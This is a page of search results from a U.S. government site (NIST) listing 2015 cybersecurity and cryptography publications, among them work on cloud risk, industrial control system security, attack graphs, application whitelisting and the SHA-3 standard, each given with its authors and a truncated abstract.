U.S. flag

An official website of the United States government

Official websites use .gov
A .gov website belongs to an official government organization in the United States.

Secure .gov websites use HTTPS
A lock ( ) or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.

Information Technology

Cybersecurity and privacy

Search Publications

Search Title, Abstract, Conference, Citation, Keyword or Author
  • Published Date
Displaying 576 - 600 of 1509

Managing Risk in a Cloud Ecosystem

December 18, 2015
Author(s)
Michaela Iorga, Anil Karmel
The article focuses on the tier 3 security risks related to the operation and use of cloud-based information systems. To prevent and mitigate any threats, adverse actions, service disruptions, attacks, or compromises, organizations need to quantify their

Third-Party Software's Trust Quagmire

December 18, 2015
Author(s)
Jeffrey M. Voas, George Hurlburt
Integrating software developed by third-party organizations into a larger system raises concerns about the software's quality, origin, functionality, security, and interoperability. Addressing these concerns requires rethinking the roles of software's

Towards a Systematic Threat Modeling Approach for Cyber-physical Systems

December 15, 2015
Author(s)
Goncalo Martins, Sajal Bhatia, Xenofon Koutsoukos, Keith A. Stouffer, CheeYee Tang, Rick Candell
Cyber-Physical Systems (CPS) are systems with seamless integration of physical, computational and networking components. These systems can potentially have an impact on the physical components, hence it is critical to safeguard them against a wide range of

An Industrial Control System Cybersecurity Performance Testbed

December 10, 2015
Author(s)
Richard Candell, Timothy A. Zimmerman, Keith A. Stouffer
The National Institute of Standards and Technology (NIST) is developing a cybersecurity performance testbed for industrial control systems. The goal of the testbed is to measure the performance of industrial control systems (ICS) when instrumented with

Trusted Geolocation in the Cloud: Proof of Concept Implementation

December 10, 2015
Author(s)
Michael Bartock, Murugiah Souppaya, Raghuram Yeluri, Uttam Shetty, James Greene, Steve Orrin, Hemma Prafullchandra, John McLeese, Jason Mills, Daniel Carayiannis, Tarik Williams, Karen Scarfone
This publication explains selected security challenges involving Infrastructure as a Service (IaaS) cloud computing technologies and geolocation. It then describes a proof of concept implementation that was designed to address those challenges. The

Tailoring Security Controls for Industrial Control Systems

November 16, 2015
Author(s)
Victoria Y. Pillitteri, Larry Feldman, Gregory A. Witte
This bulletin summarizes the information presented in NIST SP 800-82, Rev 2: Guide to Industrial Control Systems (ICS) Security written by Keith Stouffer, Victoria Pillitteri, Suzanne Lightman, Marshall Abrams and Adam Hahn. The publication provides

Minimizing Attack Graph Data Structures

November 14, 2015
Author(s)
Peter Mell, Richard Harang
An attack graph is a data structure representing how an attacker can chain together multiple attacks to expand their influence within a network (often in an attempt to reach some set of goal states). Restricting attack graph size is vital for the execution

Guide to Application Whitelisting

October 28, 2015
Author(s)
Adam Sedgewick, Murugiah Souppaya, Karen Scarfone
An application whitelist is a list of applications and application components that are authorized for use in an organization. Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host. This helps

Protection of Controlled Unclassified Information

October 19, 2015
Author(s)
Ronald S. Ross, Kelley L. Dempsey, Larry Feldman, Gregory A. Witte
This bulletin summarizes the information presented in NIST SP 800-171: Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations. The publication the protection of Controlled Unclassified Information (CUI) while

Poster:A Logic Based Network Forensics Model for Evidence Analysis

October 15, 2015
Author(s)
Anoop Singhal, Changwei Liu, Duminda Wijesekera
Modern-day attackers tend to use sophisticated multi-stage/multi-host attack techniques and anti-forensics tools to cover their attack traces. Due to the current limitations of intrusion detection and forensic analysis tools, reconstructing attack

Who Touched my Mission: Towards Probabilistic Mission Impact Assessment

October 12, 2015
Author(s)
Xiaoyan Sun, Anoop Singhal, Peng Liu
Cyber attacks inevitably generate impacts towards relevant missions. However, concrete methods to accurately evaluate such impacts are rare. In this paper, we propose a probabilistic approach based on Bayesian networks for quantitative mission impact

Spreading alerts quietly and the subgroup escape problem

October 1, 2015
Author(s)
J. Aspnes, Z. Diamadi, A. Yampolskiy, K. Gjosteen, Rene Peralta
We introduce a new cryptographic primitive called a blind coupon mechanism (BCM). In effect, a BCM is an authenticated bit commitment scheme, which is AND-homomorphic. We show that a BCM has natural and important applications. In particular, we use it to

Multiplicative Complexity of Vector Value Boolean Functions

September 21, 2015
Author(s)
Magnus G. Find, Joan Boyar
We consider the multiplicative complexity of Boolean functions with multiple bits of output, studying how large a multiplicative complexity is necessary and sufficient to provide a desired nonlinearity. For so-called $\Sigma\Pi\Sigma$ circuits, we show

Predictive Models for Min-Entropy Estimation

September 13, 2015
Author(s)
John M. Kelsey, Kerry McKay, Meltem Sonmez Turan
Random numbers are essential for cryptography. In most real-world systems, these values come from a cryptographic pseudorandom number generator (PRNG), which in turn is seeded by an entropy source. The security of the entire cryptographic system then

Computer Security Division 2014 Annual Report

August 20, 2015
Author(s)
Patrick D. O'Reilly, Gregory A. Witte, Larry Feldman
Title III of the E-Government Act of 2002, entitled the Federal Information Security Management Act (FISMA) of 2002, requires NIST to prepare an annual public report on activities undertaken in the previous year, and planned for the coming year, to carry

Constructive Relationships Between Algebraic Thickness and Normality

August 4, 2015
Author(s)
Joan Boyar, Magnus G. Find
We study the relationship between two measures of Boolean functions; "algebraic thickness" and "normality". For a function f, the algebraic thickness is a variant of the "sparsity", the number of nonzero coefficients in the unique F_2 polynomial

Secure Hash Standard

August 4, 2015
Author(s)
National Institute of Standards and Technology (NIST), Quynh Dang
This standard specifies hash algorithms that can be used to generate digests of messages. The digests are used to detect whether messages have been changed since the digests were generated. The Applicability Clause of this standard was revised to

SHA-3 Standard: Permutation-Based Hash and Extendable-Output Functions

August 4, 2015
Author(s)
National Institute of Standards and Technology (NIST), Morris J. Dworkin
This Standard specifies the Secure Hash Algorithm-3 (SHA-3) family of functions on binary data. Each of the SHA-3 functions is based on an instance of the KECCAK algorithm that NIST selected as the winner of the SHA-3 Cryptographic Hash Algorithm
Was this page helpful?